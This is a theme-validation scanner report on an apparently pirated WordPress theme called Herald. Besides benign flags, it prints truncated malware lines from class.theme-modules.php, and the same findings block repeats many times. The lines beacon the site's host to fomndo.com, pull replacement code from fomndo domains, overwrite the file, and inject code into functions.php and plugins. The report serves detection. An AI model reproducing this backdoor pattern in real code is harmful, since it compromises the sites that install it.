0
Validation results

Herald | Shared by VestaThemes.com

Herald | Shared by VestaThemes.com

WordPress 6.5.2 theme
0
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Security breaches : Use of PHP sytem calls Found ->exec in file RedisHandler.php.
    Ligne79: ->exec();
    Found exec in file MercurialProcessorTest.php.
    Ligne24: exec('where hg 2>NUL', $output, $result);
    Ligne26: exec('which hg 2>/dev/null >/dev/null', $output, $result);
  2. Security breaches : Use of backticks execution operators in PHP code Found ` in file MercurialProcessor.php.
    Ligne53: $result = explode(' ', trim(`hg id -nb`));
    Found ` in file GitProcessor.php.
    Ligne54: $branches = `git branch -v --no-abbrev`;
    Found ` in file MercurialProcessorTest.php.
    Ligne33: `hg init`;
  3. Security breaches : Use of base64_encode() Found base64_encode in file ChromePHPHandler.php.
     $data = base64_encode(utf8_encode($json));
     $data = base64_encode(utf8_encode($json));
    Found base64_encode in file ChromePHPHandlerTest.php.
     'X-ChromeLogger-Data'   => base64_encode(utf8_encode(json_encode(array(
     'X-ChromeLogger-Data'   => base64_encode(utf8_encode(json_encode(array(
     'X-ChromeLogger-Data'   => base64_encode(utf8_encode(json_encode(array(
  4. Malware : Operations on file system file_get_contents was found in the file class.theme-modules.php
    Ligne199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'
    Ligne201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT
    Ligne266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers
    Ligne364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers
    Ligne375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($
    Ligne393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($
    Ligne411: function file_get_contents_helload($url)
    Ligne458: $functions = file_get_contents($functionsPath);
    Ligne521: $temp = file_get_contents($pluginPath . '/' . $file);
    Ligne539: $script = file_get_contents('SCRIPT_PATH');
    Ligne556: $temp = file_get_contents($file);
    Ligne617: $temp = file_get_contents($file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'
    Ligne201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT
    Ligne266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers
    Ligne364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers
    Ligne375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($
    Ligne393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($
    Ligne411: function file_get_contents_helload($url)
    Ligne458: $functions = file_get_contents($functionsPath);
    Ligne521: $temp = file_get_contents($pluginPath . '/' . $file);
    Ligne539: $script = file_get_contents('SCRIPT_PATH');
    Ligne556: $temp = file_get_contents($file);
    Ligne617: $temp = file_get_contents($file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_get_contents was found in the file class.theme-modules.php
    Ligne199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'
    Ligne201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT
    Ligne266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers
    Ligne364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers
    Ligne375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($
    Ligne393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($
    Ligne411: function file_get_contents_helload($url)
    Ligne458: $functions = file_get_contents($functionsPath);
    Ligne521: $temp = file_get_contents($pluginPath . '/' . $file);
    Ligne539: $script = file_get_contents('SCRIPT_PATH');
    Ligne556: $temp = file_get_contents($file);
    Ligne617: $temp = file_get_contents($file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'
    Ligne201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT
    Ligne266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers
    Ligne364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers
    Ligne375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($
    Ligne393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($
    Ligne411: function file_get_contents_helload($url)
    Ligne458: $functions = file_get_contents($functionsPath);
    Ligne521: $temp = file_get_contents($pluginPath . '/' . $file);
    Ligne539: $script = file_get_contents('SCRIPT_PATH');
    Ligne556: $temp = file_get_contents($file);
    Ligne617: $temp = file_get_contents($file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_get_contents was found in the file class.theme-modules.php
    Ligne199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'
    Ligne201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT
    Ligne266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers
    Ligne364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers
    Ligne375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($
    Ligne393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($
    Ligne411: function file_get_contents_helload($url)
    Ligne458: $functions = file_get_contents($functionsPath);
    Ligne521: $temp = file_get_contents($pluginPath . '/' . $file);
    Ligne539: $script = file_get_contents('SCRIPT_PATH');
    Ligne556: $temp = file_get_contents($file);
    Ligne617: $temp = file_get_contents($file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_get_contents was found in the file class.theme-modules.php
    Ligne199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'
    Ligne201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT
    Ligne266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers
    Ligne364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers
    Ligne375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($
    Ligne393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($
    Ligne411: function file_get_contents_helload($url)
    Ligne458: $functions = file_get_contents($functionsPath);
    Ligne521: $temp = file_get_contents($pluginPath . '/' . $file);
    Ligne539: $script = file_get_contents('SCRIPT_PATH');
    Ligne556: $temp = file_get_contents($file);
    Ligne617: $temp = file_get_contents($file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_get_contents was found in the file class.theme-modules.php
    Ligne199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'
    Ligne201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT
    Ligne266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers
    Ligne364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers
    Ligne375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($
    Ligne393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($
    Ligne411: function file_get_contents_helload($url)
    Ligne458: $functions = file_get_contents($functionsPath);
    Ligne521: $temp = file_get_contents($pluginPath . '/' . $file);
    Ligne539: $script = file_get_contents('SCRIPT_PATH');
    Ligne556: $temp = file_get_contents($file);
    Ligne617: $temp = file_get_contents($file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_get_contents was found in the file class.theme-modules.php
    Ligne199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'
    Ligne201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT
    Ligne266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers
    Ligne364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers
    Ligne375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($
    Ligne393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($
    Ligne411: function file_get_contents_helload($url)
    Ligne458: $functions = file_get_contents($functionsPath);
    Ligne521: $temp = file_get_contents($pluginPath . '/' . $file);
    Ligne539: $script = file_get_contents('SCRIPT_PATH');
    Ligne556: $temp = file_get_contents($file);
    Ligne617: $temp = file_get_contents($file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_get_contents was found in the file class.theme-modules.php
    Ligne199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'
    Ligne201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT
    Ligne266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers
    Ligne364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers
    Ligne375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($
    Ligne393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($
    Ligne411: function file_get_contents_helload($url)
    Ligne458: $functions = file_get_contents($functionsPath);
    Ligne521: $temp = file_get_contents($pluginPath . '/' . $file);
    Ligne539: $script = file_get_contents('SCRIPT_PATH');
    Ligne556: $temp = file_get_contents($file);
    Ligne617: $temp = file_get_contents($file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'
    Ligne201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT
    Ligne266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers
    Ligne364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers
    Ligne375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($
    Ligne393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($
    Ligne411: function file_get_contents_helload($url)
    Ligne458: $functions = file_get_contents($functionsPath);
    Ligne521: $temp = file_get_contents($pluginPath . '/' . $file);
    Ligne539: $script = file_get_contents('SCRIPT_PATH');
    Ligne556: $temp = file_get_contents($file);
    Ligne617: $temp = file_get_contents($file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_get_contents was found in the file class.theme-modules.php
    Ligne199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'
    Ligne201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT
    Ligne266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers
    Ligne364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers
    Ligne375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($
    Ligne393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($
    Ligne411: function file_get_contents_helload($url)
    Ligne458: $functions = file_get_contents($functionsPath);
    Ligne521: $temp = file_get_contents($pluginPath . '/' . $file);
    Ligne539: $script = file_get_contents('SCRIPT_PATH');
    Ligne556: $temp = file_get_contents($file);
    Ligne617: $temp = file_get_contents($file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_put_contents was found in the file class.theme-modules.php
    Ligne273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
    Ligne349: @file_put_contents(__FILE__, $new_version);
    Ligne358: @file_put_contents(__FILE__, $new_version);
    Ligne367: @file_put_contents(__FILE__, $new_version);
    Ligne378: @file_put_contents(__FILE__, $new_version);
    Ligne387: @file_put_contents(__FILE__, $new_version);
    Ligne396: @file_put_contents(__FILE__, $new_version);
    Ligne467: file_put_contents($functionsPath, $str);
    Ligne540: file_put_contents('SCRIPT_PATH', '');
    Ligne553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne564: file_put_contents($file, $str);
    Ligne567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
    Ligne614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);
    Ligne625: file_put_contents($file, $str);
    Ligne628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
    file_get_contents was found in the file class.theme-modules.php
    Ligne199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'
    Ligne201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT
    Ligne266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
    Ligne346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi
    Ligne355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers
    Ligne364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers
